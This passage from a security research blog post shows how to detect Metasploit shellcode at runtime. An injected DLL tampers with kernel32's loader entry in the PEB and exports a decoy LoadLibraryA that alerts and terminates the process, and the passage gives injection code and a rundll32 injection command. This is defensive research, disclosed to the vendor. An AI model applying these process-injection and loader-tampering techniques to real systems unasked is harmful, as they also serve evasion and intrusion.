    PLIST_ENTRY pEntry = NULL;
    PLDR_DATA_TABLE_ENTRY pLdrEntry = NULL;
    USHORT MaximumLength = NULL;

    // Read the PEB from the current process
    if ((pPeb = GetCurrentPebProcess()) == NULL) {
        MessageBoxError("GetPebCurrentProcess failed.");
        return;
    }

    // Get the InMemoryOrderModuleList
    pLdrData = pPeb->Ldr;
    pHeadEntry = &pLdrData->InMemoryOrderModuleList;

    // Loop the modules
    for (pEntry = pHeadEntry->Flink; pEntry != pHeadEntry; pEntry = pEntry->Flink) {
        pLdrEntry = CONTAINING_RECORD(pEntry, LDR_DATA_TABLE_ENTRY, InMemoryOrderModuleList);
        // Skip modules which aren't kernel32.dll
        if (lstrcmpiW(pLdrEntry->BaseDllName.Buffer, L"KERNEL32.DLL")) continue;
        // Compute the new maximum length
        MaximumLength = pLdrEntry->BaseDllName.MaximumLength + 1;
        // Create a new increased buffer
        wchar_t* NewBuffer = new wchar_t[MaximumLength];
        wcscpy_s(NewBuffer, MaximumLength, pLdrEntry->BaseDllName.Buffer);
        // Update the BaseDllName
        pLdrEntry->BaseDllName.Buffer = NewBuffer;
        pLdrEntry->BaseDllName.MaximumLength = MaximumLength;
        break;
    }
    return;
}

This logic is best triggered as soon as possible once injection occurred. While this could be done through a TLS hook, we will for simplicity update the existing DllMain function to invoke Metasplop on DLL_PROCESS_ATTACH.

HMODULE hPayload;

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hPayload = hModule;
        Metasplop();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

The Signal

As the shellcode we analyzed relied on LoadLibraryA, let’s build an implementation which will simply raise the Metasploit alert and then terminate the current malicious process. The following function will only be triggered by the shellcode and is itself never called from within our DLL.

_Ret_maybenull_
HMODULE
WINAPI
LoadLibraryA(_In_ LPCSTR lpLibFileName)
{
    #pragma EXPORT
    // Raise the error message
    char buffer[200];
    if (sprintf_s(buffer, 200, "The process %d has attempted to load \"%s\" through LoadLibraryA using Metasploit's dynamic import resolution.\n", GetCurrentProcessId(), lpLibFileName) > 0)
    {
        MessageBoxError(buffer);
    }
    // Exit the process
    ExitProcess(-1);
}

The above approach can be performed for other variations such as LoadLibraryW, LoadLibraryExA and others.

The Result

With our emulated security solution ready, we can proceed to demonstrate our technique. As such, we’ll start by executing Shellcode.exe, a simple shellcode loader (show on the left in figure 24). This shellcode loader mentions its process ID (which we’ll target for injection) and then waits for the shellcode path it needs to execute.

Once we know in which process the shellcode will run, we can inject our emulated security solution (shown on the right in figure 24). This process is typically performed by the security solution for each process and is merely done manually in our PoC for simplicity. Using our custom DLL, we can inject into the desired process using the following command where the path to hernel32.dlx and the process ID have been picked accordingly.

# rundll32.exe <dll_path>,Inject <target_pid>
rundll32.exe C:\path\to\hernel32.dlx,Inject 6780
Figure 24: Manually emulating the AV injection into the future malicious process.

Once the injection is performed, the Shellcode.exe process has been staged (module buffer resized, colliding DLL loaded) for exploitation of the CWE-1288 weakness should any Metasploit shellcode run. It is worth noting that at this stage, no shellcode has been loaded nor has there been any memory allocation for it. This ensures we comply with the assumption that we don’t know where shellcode is executing.

With our mock security solution injected, we can proceed to provide the path to our initially generated shellcode (shellcode.vir in our case) to the soon-to-be malicious Shellcode.exe process (left in figure 25).

Figure 25: Executing the malicious shellcode as would be done by the stagers.

Once the shellcode runs, we can see how in figure 26 our LoadLibraryA signalling function gets called, resulting in a high-confidence detection of shellcode-based import resolution.

Figure 26: The input-validation flaw and hash collision being chained to signal the AV.

Disclosure

As a matter of courtesy, NVISO delayed the publishing of this blog post to provide Rapid7, the maintainers of Metasploit, with sufficient review time.

Conclusion

This blog post highlighted the anatomy of Metasploit shellcode with an additional focus on the dynamic import resolution. Within this dynamic import resolution we further identified two weaknesses, one of which can be leveraged to identify runtime Metasploit shellcode with high confidence.

At NVISO, we are always looking at ways to improve our detection mechanisms. Understanding how Metasploit works is one part of the bigger picture and as a result of this research, we were able to build Yara rules identifying Metasploit payloads by fingerprinting both import hashes and average distances between them. A subset of these rules is available upon request.

❌